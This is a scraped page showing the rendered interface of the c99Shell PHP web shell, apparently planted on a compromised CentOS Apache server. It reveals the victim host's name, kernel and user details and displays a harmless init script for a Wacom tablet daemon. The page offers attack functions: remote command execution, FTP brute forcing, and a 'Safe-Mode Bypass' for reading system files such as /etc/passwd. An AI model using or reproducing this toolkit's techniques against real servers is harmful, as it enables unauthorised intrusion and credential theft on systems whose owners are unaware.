!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/etc/rc.d/rc5.d/   drwxr-xr-x
Free 52.28 GB of 127.8 GB (40.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     K05wdaemon (1.96 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/bin/bash # # /etc/rc.d/init.d/wdaemon # # Starts the wdaemon # # chkconfig: - 95 5 # description: helps X.org to support Wacom tablets hotplugging by creating \ # permanent uinput devices that may be feeded by real tablets events while \ # the hardware is present. # processname: wdaemon # Source function library. . /etc/init.d/functions test -x /usr/bin/wdaemon || exit 0 RETVAL=0 # # See how we were called. # prog="wdaemon" start() { # Check if there's already a configuration present if [ ! -f /etc/wdaemon.conf ]; then echo "wdaemon configuration file not present yet"; return 0; fi # Check if wdaemon is already running if [ ! -f /var/lock/subsys/wdaemon ]; then if [ -z "$(lsmod | grep uinput)" ]; then echo -n $"Loading uinput module: " modprobe uinput; RETVAL=$? [ $RETVAL -eq 0 ] && success || (failure; return $RETVAL); echo; for count in $(seq 1 3); do if [ -e /dev/uinput ]; then break; fi sleep 1; done if [ ! -e /dev/uinput ]; then logger -p daemon.err -t wdaemon "/dev/uinput not available"; failure; return 1; fi fi echo -n $"Starting $prog: " daemon /usr/bin/wdaemon -c /etc/wdaemon.conf -f >/dev/null; RETVAL=$? [ $RETVAL -eq 0 ] && (success; touch /var/lock/subsys/wdaemon) || failure; echo fi return $RETVAL } stop() { echo -n $"Stopping $prog: " killproc /usr/bin/wdaemon RETVAL=$? [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/wdaemon echo return $RETVAL } restart() { stop start } reload() { restart } status_at() { status /usr/bin/wdaemon } case "$1" in start) start ;; stop) stop ;; reload|restart) restart ;; condrestart) if [ -f /var/lock/subsys/wdaemon ]; then restart fi ;; status) status_at ;; *) echo $"Usage: $0 {start|stop|restart|condrestart|status}" exit 1 esac exit $? exit $RETVAL

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--